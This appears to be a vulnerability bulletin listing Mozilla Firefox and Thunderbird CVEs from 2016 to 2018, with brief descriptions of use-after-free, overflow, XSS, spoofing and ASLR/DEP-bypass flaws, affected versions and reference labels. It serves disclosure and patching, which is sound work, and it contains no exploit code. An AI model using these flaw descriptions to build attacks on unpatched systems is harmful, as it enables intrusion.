A use-after-free vulnerability can occur in the Fetch API when the worker or the associated window are freed when still in use, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.
2018-06-11
not yet calculated
CVE-2017-7793
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An integer overflow can occur in the Skia library due to 32-bit integer use in an array without integer overflow checks, resulting in possible out-of-bounds writes. This could lead to a potentially exploitable crash triggerable by web content. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.
2018-06-11
not yet calculated
CVE-2018-5159
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur while re-computing layout for a "marquee" element during window resizing where the updated style object is freed while still in use. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7801
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur in design mode when image objects are resized if objects referenced during the resizing have been freed from memory. This results in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.
2018-06-11
not yet calculated
CVE-2017-7819
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The content security policy (CSP) "sandbox" directive did not create a unique origin for the document, causing it to behave as if the "allow-same-origin" keyword were always specified. This could allow a Cross-Site Scripting (XSS) attack to be launched from unsafe content. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4.
2018-06-11
not yet calculated
CVE-2017-7823
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 50.1 and Firefox ESR 45.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5373
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during XSLT processing due to poor handling of template parameters. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5439
BID
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during XSLT processing due to the result handler being held by a freed handler during handling. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5438
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Use-after-free resulting in potentially exploitable crash when manipulating DOM subtrees in the Editor. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.
2018-06-11
not yet calculated
CVE-2016-9898
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during video control operations when a "<track>" element holds a reference to an older window if that window has been replaced in the DOM. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7750
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Fixed potential buffer overflows in generated Firefox code due to the CVE-2016-6354 issue in Flex. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5469
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability occurs during transaction processing in the editor during design mode interactions. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5435
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability occurs when redirecting focus handling which results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5434
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability when using an incorrect URL during the reloading of a docshell. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7749
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow resulting in a potentially exploitable crash due to memory allocation issues when handling large amounts of incoming data. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50.
2018-06-11
not yet calculated
CVE-2016-9066
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An attacker could use a JavaScript Map/Set timing attack to determine whether an atom is used by another compartment/zone in specific contexts. This could be used to leak information, such as usernames embedded in JavaScript code, across websites. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.
2018-06-11
not yet calculated
CVE-2016-9904
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when form input elements, focus, and selections are manipulated by script content. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5098
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when manipulating HTML media elements with media streams, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5102
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Default fonts on OS X display some Tibetan characters as whitespace. When used in the address bar as part of an IDN this can be used for domain name spoofing attacks. Note: This attack only affects OS X operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7763
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds memory write while processing Vorbis audio data was reported through the Pwn2Own contest. This vulnerability affects Firefox < 59.0.1, Firefox ESR < 52.7.2, and Thunderbird < 52.7.
2018-06-11
not yet calculated
CVE-2018-5146
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
MLIST
UBUNTU
UBUNTU
UBUNTU
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
On pages containing an iframe, the "data:" protocol can be used to create a modal alert that will render over arbitrary domains following page navigation, spoofing the origin of the modal alert from the iframe content. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7791
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Thunderbird 45.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6.
2018-06-11
not yet calculated
CVE-2016-9893
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow occurs when drawing and validating elements using Direct 3D 9 with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash. Note: This attack only affects Windows operating systems. Other operating systems are unaffected. This vulnerability affects Thunderbird < 52.5.2, Firefox ESR < 52.5.2, and Firefox < 57.0.2.
2018-06-11
not yet calculated
CVE-2017-7845
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Same-origin policy protections can be bypassed on pages with embedded iframes during page reloads, allowing the iframes to access content on the top level page, leading to information disclosure. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7787
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability with content viewer listeners that results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7751
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when an editor DOM node is deleted prematurely during tree traversal while still bound to the document. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7809
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The "Mark of the Web" was not correctly saved on Windows when files with very long names were downloaded from the Internet. Without the Mark of the Web data, the security warning that Windows displays before running executables downloaded from the Internet is not shown. Note: This attack only affects Windows operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-7765
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory corruption resulting in a potentially exploitable crash during garbage collection of JavaScript due to errors in how incremental sweeping is managed for memory cleanup. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
2018-06-11
not yet calculated
CVE-2017-5410
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free can occur when events are fired for a "FontFace" object after the object has already been destroyed while working with fonts. This results in a potentially exploitable crash. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
2018-06-11
not yet calculated
CVE-2017-5402
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur during XSL transformations when the source document for the transformation is manipulated by script content during the transformation. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5097
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read during the processing of glyph widths during text layout. This results in a potentially exploitable crash and could allow an attacker to read otherwise inaccessible memory. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5447
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read when an HTTP/2 connection to a server sends "DATA" frames with incorrect data content. This leads to a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5446
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow can occur when manipulating Accessible Rich Internet Applications (ARIA) attributes within the DOM. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55.
2018-06-11
not yet calculated
CVE-2017-7785
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 59, Firefox ESR 52.7, and Thunderbird 52.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.
2018-06-11
not yet calculated
CVE-2018-5150
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability when holding a selection during scroll events. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5441
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability with the frameloader during tree reconstruction while regenerating CSS layout when attempting to use a node in the tree that no longer exists. This results in a potentially exploitable crash. This vulnerability affects Firefox < 54, Firefox ESR < 52.2, and Thunderbird < 52.2.
2018-06-11
not yet calculated
CVE-2017-5472
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
URLs containing certain Unicode glyphs for alternative hyphens and quotes do not properly trigger punycode display, allowing for domain name spoofing attacks in the location bar. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5383
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds write in the Graphite 2 library triggered with a maliciously crafted Graphite font. This results in a potentially exploitable crash. This issue was fixed in the Graphite 2 library as well as Mozilla products. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5436
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
In the Windows 10 April 2018 Update, Windows Defender SmartScreen honors the "SEE_MASK_FLAG_NO_UI" flag associated with downloaded files and will not show any UI. Files that are unknown and potentially dangerous will be allowed to run because SmartScreen will not prompt the user for a decision, and if the user is offline all files will be allowed to be opened because Windows won't prompt the user to ask what to do. Firefox incorrectly sets this flag when downloading files, leading to less secure behavior from SmartScreen. Note: this issue only affects Windows 10 users running the April 2018 update or later. It does not affect other Windows users or other operating systems. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.
2018-06-11
not yet calculated
CVE-2018-5174
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
JIT code allocation can allow for a bypass of ASLR and DEP protections leading to potential memory corruption attacks. This vulnerability affects Thunderbird < 45.7, Firefox ESR < 45.7, and Firefox < 51.
2018-06-11
not yet calculated
CVE-2017-5375
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
EXPLOIT-DB
EXPLOIT-DB
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An integer overflow can occur during conversion of text to some Unicode character sets due to an unchecked length parameter. This vulnerability affects Firefox ESR < 52.7 and Thunderbird < 52.7.
2018-06-11
not yet calculated
CVE-2018-5144
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability in SVG Animation has been discovered. An exploit built on this vulnerability has been discovered in the wild targeting Firefox and Tor Browser users on Windows. This vulnerability affects Firefox < 50.0.2, Firefox ESR < 45.5.1, and Thunderbird < 45.5.1.
2018-06-11
not yet calculated
CVE-2016-9079
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
EXPLOIT-DB
EXPLOIT-DB
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when the widget listener is holding strong references to browser objects that have previously been freed, resulting in a potentially exploitable crash when these references are used. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5099
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A vulnerability while parsing "application/http-index-format" format content where uninitialized values are used to create an array. This could allow the reading of uninitialized memory into the arrays affected. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5445
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An integer overflow vulnerability in the Skia library when allocating memory for edge builders on some systems with at least 8 GB of RAM. This results in the use of uninitialized memory, resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.6, Firefox ESR < 52.6, and Firefox < 58.
2018-06-11
not yet calculated
CVE-2018-5095
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
The Resource Timing API incorrectly revealed navigations in cross-origin iframes. This is a same-origin policy violation and could allow for data theft of URLs loaded by users. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.
2018-06-11
not yet calculated
CVE-2017-7830
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Thunderbird 45.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
2018-06-11
not yet calculated
CVE-2017-5398
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability occurs during certain text input selection resulting in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5432
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Using SVG filters that don't use the fixed point math implementation on a target iframe, a malicious page can extract pixel values from a targeted user. This can be used to extract history information and read text values across domains. This violates same-origin policy and leads to information disclosure. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8.
2018-06-11
not yet calculated
CVE-2017-5407
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur while enumerating attributes during SVG animations with clip paths. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.
2018-06-11
not yet calculated
CVE-2018-5154
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when flushing and resizing layout because the "PressShell" object has been freed while still in use. This results in a potentially exploitable crash during these operations. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.
2018-06-11
not yet calculated
CVE-2017-7828
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
MLIST
MLIST
DEBIAN
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
If a page is loaded from an original site through a hyperlink and contains a redirect to a "data:text/html" URL, triggering a reload will run the reloaded "data:text/html" page with its origin set incorrectly. This allows for a cross-site scripting (XSS) attack. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53.
2018-06-11
not yet calculated
CVE-2017-5466
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 52, Firefox ESR 52, and Thunderbird 52. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5430
BID
SECTRACK
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Memory safety bugs were reported in Firefox 54, Firefox ESR 52.2, and Thunderbird 52.2. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55. | 2018-06-11 | not yet calculated | CVE-2017-7779
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A possibly exploitable crash triggered during layout and manipulation of bidirectional unicode text in concert with CSS animations. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5449
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow occurs when drawing and validating elements with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4. | 2018-06-11 | not yet calculated | CVE-2017-7824
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A buffer overflow vulnerability while parsing "application/http-index-format" format content when the header contains improperly formatted data. This allows for an out-of-bounds read of data from memory. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5444
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Sites can bypass security checks on permissions to install lightweight themes by manipulating the "baseURI" property of the theme element. This could allow a malicious site to install a theme without user interaction which could contain offensive or embarrassing images. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8. | 2018-06-11 | not yet calculated | CVE-2018-5168
BID
SECTRACK
REDHAT
REDHAT
REDHAT
REDHAT
CONFIRM
MLIST
MLIST
UBUNTU
UBUNTU
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Use-after-free while manipulating DOM events and removing audio elements due to errors in the handling of node adoption. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6. | 2018-06-11 | not yet calculated | CVE-2016-9899
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read while processing SVG content in "ConvolvePixel". This results in a crash and also allows for otherwise inaccessible memory being copied into SVG graphic content, which could then be displayed. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5465
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
EXPLOIT-DB
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An error in the "WindowsDllDetourPatcher" where a RWX ("Read/Write/Execute") 4k block is allocated but never protected, violating DEP protections. Note: This attack only affects Windows operating systems. Other operating systems are not affected. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55. | 2018-06-11 | not yet calculated | CVE-2017-7782
BID
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An out-of-bounds read occurs when applying style rules to pseudo-elements, such as ::first-line, using cached style data. This vulnerability affects Thunderbird < 52.3, Firefox ESR < 52.3, and Firefox < 55. | 2018-06-11 | not yet calculated | CVE-2017-7753
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
Event handlers on "marquee" elements were executed despite a strict Content Security Policy (CSP) that disallowed inline JavaScript. This vulnerability affects Firefox < 50.1, Firefox ESR < 45.6, and Thunderbird < 45.6. | 2018-06-11 | not yet calculated | CVE-2016-9895
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A potential memory corruption and crash when using Skia content when drawing content outside of the bounds of a clipping region. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5467
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
An existing mitigation of timing side-channel attacks is insufficient in some circumstances. This issue is addressed in Network Security Services (NSS) 3.26.1. This vulnerability affects Thunderbird < 45.5, Firefox ESR < 45.5, and Firefox < 50. | 2018-06-11 | not yet calculated | CVE-2016-9074
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability during changes in style when manipulating DOM elements. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 52.1, Firefox ESR < 45.9, Firefox ESR < 52.1, and Firefox < 53. | 2018-06-11 | not yet calculated | CVE-2017-5442
BID
SECTRACK
REDHAT
REDHAT
REDHAT
CONFIRM
DEBIAN
CONFIRM
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free vulnerability can occur when manipulating arrays of Accessible Rich Internet Applications (ARIA) elements within containers through the DOM. This results in a potentially exploitable crash. This vulnerability affects Firefox < 56, Firefox ESR < 52.4, and Thunderbird < 52.4. | 2018-06-11 | not yet calculated | CVE-2017-7818
BID
SECTRACK
REDHAT
REDHAT
CONFIRM
MLIST
GENTOO
DEBIAN
DEBIAN
CONFIRM
CONFIRM
CONFIRM
mozilla -- multiple_products
 
A use-after-free error can occur when manipulating ranges in selections with one node inside a native anonymous tree and one node outside of it. This results in a potentially exploitable crash. This vulnerability affects Firefox < 52, Firefox ESR < 45.8, Thunderbird < 52, and Thunderbird < 45.8. | 2018-06-11 | not yet calculated | CVE-2017-5404
REDHAT
REDHAT
REDHAT
BID
SECTRACK
CONFIRM
GENTOO
GENTOO
DEBIAN
DEBIAN
EXPLOIT-DB
